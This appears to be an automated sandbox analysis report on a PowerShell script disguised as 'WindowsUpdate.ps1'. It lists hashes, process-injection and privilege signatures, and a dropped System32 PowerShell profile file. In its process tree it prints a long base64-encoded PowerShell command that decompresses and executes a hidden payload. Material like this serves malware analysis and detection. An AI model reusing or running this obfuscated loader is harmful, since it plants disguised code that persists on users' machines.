7c846629e0c60135165a240803e8df5a9e5d4a8588b903d431d07e7a63c508b3

Analysis

max time kernel
162s
max time network
120s
platform
windows7_x64
resource
win7-20230831-en
resource tags

arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system
submitted
23-09-2023 07:51

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

WindowsUpdate.ps1
Size

9KB
MD5

11159d6a99b66a8f158f7410350ca727
SHA1

efbffc809d1645bc196231951aa1e7f695180cd3
SHA256

7c846629e0c60135165a240803e8df5a9e5d4a8588b903d431d07e7a63c508b3
SHA512

0f6b91bbaa24c8478d80026d8eca9e3559c6b0524157c48040c216ab38ef9fe168e4c10e09b7604ea6b8b8ed1cc96f32d94438439e6b9ea1fb2e347b5944992d
SSDEEP

192:BJEaBB8CMPVQwdja9Pfx6ShbaHAIUtb1LjtsBJ5WzeBydapie2ISrt:BFBB8NRa9PgShbaHHUtbJeP5WzEydapG

Score

5^/10

Malware Config

Signatures

Drops file in System32 directory 1 IoCs

description	ioc	Process
File created	C:\Windows\System32\WindowsPowerShell\v1.0\profile.ps1	powershell.exe

Suspicious behavior: EnumeratesProcesses 30 IoCs

pid	Process
1692	powershell.exe
2976	powershell.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
1044	taskmgr.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	1692	powershell.exe
Token: SeDebugPrivilege	2976	powershell.exe
Token: SeDebugPrivilege	1044	taskmgr.exe

Suspicious use of FindShellTrayWindow 55 IoCs

pid	Process
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe

Suspicious use of SendNotifyMessage 54 IoCs

pid	Process
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe
1044	taskmgr.exe

Suspicious use of WriteProcessMemory 3 IoCs

description	pid	Process	procid_target
PID 1692 wrote to memory of 2976	1692	powershell.exe	29
PID 1692 wrote to memory of 2976	1692	powershell.exe	29
PID 1692 wrote to memory of 2976	1692	powershell.exe	29

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\WindowsUpdate.ps1
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1692
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -E cwBhAGwAIABhACAATgBlAHcALQBPAGIAagBlAGMAdAA7AGkAZQB4ACgAYQAgAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgAKABhACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARABlAGYAbABhAHQAZQBTAHQAcgBlAGEAbQAoAFsASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AXQBbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAcABWAFYAYgBiADkAcABJAEYASAA3AG4AVgA0AHcAUQBrAHEARQBzAGgARQB1AEMAYQBCAEQAUwBBAGoARwB4AGsAMgBBAE0ATgByAGUARQBLAEUAegBzAEEAZAB6AFkATQArADUANABEAEQAZwBwAC8AMwAyAFAATQBhAFIAdABXAG4AVwBsADMAUgBkADcAegBtAFgATwA1AFQAdQBYAFMAUwAxAEQAYQBnAG0ASABVAFQAVAB5AGIAUwB4AEkAWQBlAEoAUQBtADIAMgBEAHQANQBTAE8ATwBmAGEAeQBEADgAYgBXAEUAZABiADYATQBhAE0AVABIAGoAaQBCAHkASwBVAHkATQB1AGUATQB0AHcANgBYAGQARQA2AFcAaABCAE4AcQBrAGEAWgBrAE8AQwA2AGgAdwBvADAANgBqAEEAcQBIAGgAawBSAEsAWgBRAHkATABPADcANQBvAHYAZwBYAFkAUgBSAGgAcABaAEYAdgBvAFAAMwA4AGgAbABtAGcANABaAEoAZgBGAFMATwAwAFgARABjAEUASgA5AG8AWQBFADIANABSAG4ARQAxAGEASABlAFQANABuAFEAUQBEAG0AaQAxAGQAawA2AFUASgBRAGkAVgBiADIAQQBhAFEAOQA0AGoARQBlAEoAWQB6AEgAQgAvAEMAMQBJAFYAdwA4AFgAbAA1ADIATwBmAFAAYQBPAEMAQwAxAGMANQBBADUAZABKAFcAVgB6AE4AbgBuAHQAbABIAFgAVwByAEkANgAzAGEAeQBYAE4AVwBVADIAZgBuAG0ANQBtAGMAegBNADQAZABWAE8AdABuAGoAYgAyAGMANgAwADIAZABmAGIAaQBWAEsAUgBkAGMATQBNAHkAMAA3AGcAaQBzAHAATgBxAGQATABKAGEAMwBuAGIASAAxADcAVQByAHUAKwAvAFYATwAvADUAZQBWAFgAZABsAFUAWgBNAEMAWgBUAHoAbAAzAFUAcABFAHQAcgBJAEsAeQBuAGwAUwBiAGYAUABwAHoAYwBXAHMAVgBYADkAcQAzAEYAYgBhAGQAMwAzAHkANwBzAHAAOQBUADUAUAB5AHMAOQA5AGYATgBZAHIAVQAyAHQAZAB1ADkARQBIAFgAYgBkADMATgBxAEcAYQBNAHQAUwBDACsAdgBTAFYAegArAHIAcgAxAGwAbgAxAHQAcQByAFcAdQA3AEoASABLADUAMQBSAFMAZQB2ADMAdQA4ACsANwA3AFkAVgA1AFAAYgB5AHkASABlAEsAOQBuAEcAdABsAFcAWABiAHQAZQA3AFcAKwAwAG8AeQBCAHQAcAAxAE4AbQBNADEAbgByADIAMwA1AFcAagB2AGYAMABmAHAAVQBHAHgAbwAxAHAANwBTAFoAdgBvADUAdgBkAEwATwAxAEgAaQBqADUAKwAyAGMAegB1AE4AVgA4AC8ALwBWAHMAbwAwAFMAQwBEAFcAYQA3AFcAMAB1ADEAcwBhADUAVgBOAC8AZgA1AHAAZQAxAFAAMQB5ADIAbQBYAFAAVABYAGsAVABiAGwAbgBUAEcAdgA1AEwAOQB1AHgAMgBmAFIAagBiADIAaABuAGYAcwA2ADkAdgAyAEwAcgBVAHoAYQA5AGkAWgBjADcAbQBiAEwANQBhAEIAOQBsAFcAKwAxAG0AawAwAHAAOQA5AGYARABoADEATAA4AGMATwA0AHgAbQB3AEQAawBWADgAUQA2ADgAbgBLAGcAYgBwAEsAZABLAE0AcgBVAFkAagBhAGcARAA5AEsAVwAwAFYASABWAFgASwA0AFkAMQA5AFoAawBNAHIAVwB6AHUAWAAzAEsAVwBXAGIAZgBHACsAawB0AHAAcQBDAC8AaQBCAFYAeQBSADAAUgBGAEgAYwBwAG0ATwBUADUAMgBpADgAYwBXAGYARwBjADgALwBrAEYASgB0AGEASABwAFEAQQBJAGUAcgA0AG4AbwBoAEIAeQA2AFUAVwBUAEIAcgB4AHEAbwBkAE0AaABjADgAaQBjAFAANwBkAEIAeABSAGEATAAyAEsATABWAHMAegA2AEUAUQBHAE0AZQBDAGMAUwBtAFgAUwA3ADEAbABkAE0ANgBXAHoAWQB3ACsANwBIAGYAVgBPADcAbgBZAGMAdAAxAFIAQQBNAEgARABYADIARwBCAEMAQgBvAFoASABVAGMAdQB3ADMAWQB6AHYAYwBoADAAdwBSAEwAaABUAFkATwBJAHcAcwBSAHoAVgBCAG8ASQBEAEYATwBCAEMAaAAwAFgAQgB3AEYANgBlAHAASQAzAEUARgBlAGkAaABBAG8AYQA5AGsAagBnAFkANQBBAHYAMABwAHcAeABNAFEALwBDADUAKwBBAHcASwA0AEQAdQBJAG8AMABLAEwAYgA0AEsAUABiAGcAUQBvAEwALwBmAEsAQwBnADMAcABXAFEANgB1AGQAUQA0AEcASQBvAE4ARwBMAEcAQgBwAG4AUwA0ADMAMwBHADgAYwBVAFYAcQBEAEUATABDAG8AegB0AE0AVgB5AEYAZQBrAGUAWQBpAFAAUgBuAGMATABkAEkASgBGAHkAaABEAHYAcABNADcASgB2AHEARQB1AHMATgArAEQAMABJADYAQgBRAG4AbABkAEoAYQBPAGgAVwBQAG4AQgArAHQAbwBvAHAAcQBLAHEAcQBGAGEAQwBVADAAVQBlAFMAZwBqAEUALwBNAFYARQBlADkASgBxAFUAWQBMAFMAUQBCAGgAdABmAEoAMAB4AHkAegBzAG0AbwA1AEgASgBOAFQAUwByAGoANABvAEYAaABVAFcAYwB0AFIARQA1AFkAdgBmAEMAWAB1AHcASgBBAFEAQgBjAGEAbQBFAHIAbwBmADkAawBmADcAZAA3AFMASwA5AGIAeQB3AHkATQBOAHcAQgBvAFAAQQBiAFUAUAA4AFYAdgB3AFIAMQBDAFgAcgBXAHcAOQBTACsAYwB5AGcANQBKAEgAYQB5AEsAUAAyAE0ATQBQAG8AQQA4AFEALwBYAFQATwBMADUAOABRAFkAQwArAEIAYQBaADcAQwBJAGoAMAA4ADIAbABFAFEAVwBDAGUARQBQAHcAbQA1AHMAbgA1ADIAcABsAGYAdQBwAFoAdABpAFgAYwBXAEIAUABYAG4AVwAvAEsAeABkAEwAYwBqACsAawBnAHAAbwB0AGsARgAwAGYATwBxAEUAcgBCAEMAWQBiADEAdQBTAEYAUQBuAEcASAA0AEkAOABPAE4AbQB0AEkAUwB1AHcARwBSADkAbwAzAC8AbQB2AFgAVABVADkASgBtAEoAagB1AGwAMgA0AGIAWQBZAEMAaAAvAFQAdgByAFkAcwBLAGYATwBiAGIAeQBqAC8AUgAzADQAUABmAHEARwArAHEARQBvAGEASwBIAHIAcAB2AGMAcABBAG4ASAA5AE0AaABUAEgAaQBZAHMASAA0ADkAZQA1AGsATwBLAFYAcgB3AEoAQQBjAE0AZQBIAFAAUgAyAGgAZwBvADcARgBHAGkAbQAzAG4AZABHAGwAdwBaAFoAaQBpAHoAbQBaADkAeAB5AEwAcwB3AEMAbwBFADQAagB6AG8AOQBGAHgAdgBDAGsAWQBuAFEATgBHADgAeQBUADkANAB5AE0ARgBJADMAUwB5AGEARQBZACsAUQBjAG4ASwBSADQAVQB4AGQAawBPAEMAMABvAHQAMABKAHYAcwAvAEsAeABYAEQAKwBYAE8AdAAwAFAARgBsAE4ARQBUAGsARQBxAFEANABOAGkAeQBlAHQATABSAFAAZQBTACsAMgB3ADEASABXADgARgAxAEgASgBOAG4AQgBOADQANABlAEgAWgBEAEsAcABiAEkAcgA2ADMAaABFAGUAWgBTAFYAawBBAFEAVABXAEkATwBlAHoANgBQAGoAKwA1AGoANwBGAG8ATQBNAFoAUwBDAEoASABpAHAAMABXAFEAcABlAFMASABUAEMAOABkAHUAcABDAEsAawBKADcARABGAFMAQQBOAEkAUAB4AGIAdgA0AHYAVABLAEoAdQBhAEoASwBOACsAeQBGAHgATwB0ADIALwArAEYAUgBoADkAQwBTADUAWgB0AEsALwBRAE0APQAnACkALABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACwAWwBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkA
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2976

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1044

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
d6a51cd83a6563a3b8742cc40c1e0268

SHA1
c92844493b10042b8e4af5bca83947f7f87be23f

SHA256
b891cda4004f78291c71bbead56691ed9459bdc6bd63be2e3d3fc2e1189321e2

SHA512
923534e89b2c8517a419ca83a3d1f7a3086e0f93bfb03357ac9d954645c00f1e54f1df80012c9d0aae0f4bd156eb076442d4854cbfc5a3bd953c8ee4047dfc49

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\NT5767WOKCFR4JZTQEXO.temp

Filesize
7KB

MD5
d6a51cd83a6563a3b8742cc40c1e0268

SHA1
c92844493b10042b8e4af5bca83947f7f87be23f

SHA256
b891cda4004f78291c71bbead56691ed9459bdc6bd63be2e3d3fc2e1189321e2

SHA512
923534e89b2c8517a419ca83a3d1f7a3086e0f93bfb03357ac9d954645c00f1e54f1df80012c9d0aae0f4bd156eb076442d4854cbfc5a3bd953c8ee4047dfc49

Download Submit
memory/1044-27-0x0000000140000000-0x00000001405E8000-memory.dmp

Filesize
5.9MB

Download
memory/1044-26-0x0000000140000000-0x00000001405E8000-memory.dmp

Filesize
5.9MB

Download
memory/1044-25-0x0000000140000000-0x00000001405E8000-memory.dmp

Filesize
5.9MB

Download
memory/1044-24-0x0000000140000000-0x00000001405E8000-memory.dmp

Filesize
5.9MB

Download
memory/1692-23-0x000007FEF5450000-0x000007FEF5DED000-memory.dmp

Filesize
9.6MB

Download
memory/1692-4-0x000000001B340000-0x000000001B622000-memory.dmp

Filesize
2.9MB

Download
memory/1692-9-0x0000000002800000-0x0000000002880000-memory.dmp

Filesize
512KB

Download
memory/1692-5-0x0000000002300000-0x0000000002308000-memory.dmp

Filesize
32KB

Download
memory/1692-10-0x0000000002800000-0x0000000002880000-memory.dmp

Filesize
512KB

Download
memory/1692-7-0x0000000002800000-0x0000000002880000-memory.dmp

Filesize
512KB

Download
memory/1692-6-0x000007FEF5450000-0x000007FEF5DED000-memory.dmp

Filesize
9.6MB

Download
memory/1692-8-0x000007FEF5450000-0x000007FEF5DED000-memory.dmp

Filesize
9.6MB

Download
memory/2976-17-0x00000000029F0000-0x0000000002A70000-memory.dmp

Filesize
512KB

Download
memory/2976-22-0x000007FEF5450000-0x000007FEF5DED000-memory.dmp

Filesize
9.6MB

Download
memory/2976-21-0x00000000029F0000-0x0000000002A70000-memory.dmp

Filesize
512KB

Download
memory/2976-20-0x00000000029F0000-0x0000000002A70000-memory.dmp

Filesize
512KB

Download
memory/2976-18-0x000007FEF5450000-0x000007FEF5DED000-memory.dmp

Filesize
9.6MB

Download
memory/2976-16-0x000007FEF5450000-0x000007FEF5DED000-memory.dmp

Filesize
9.6MB

Download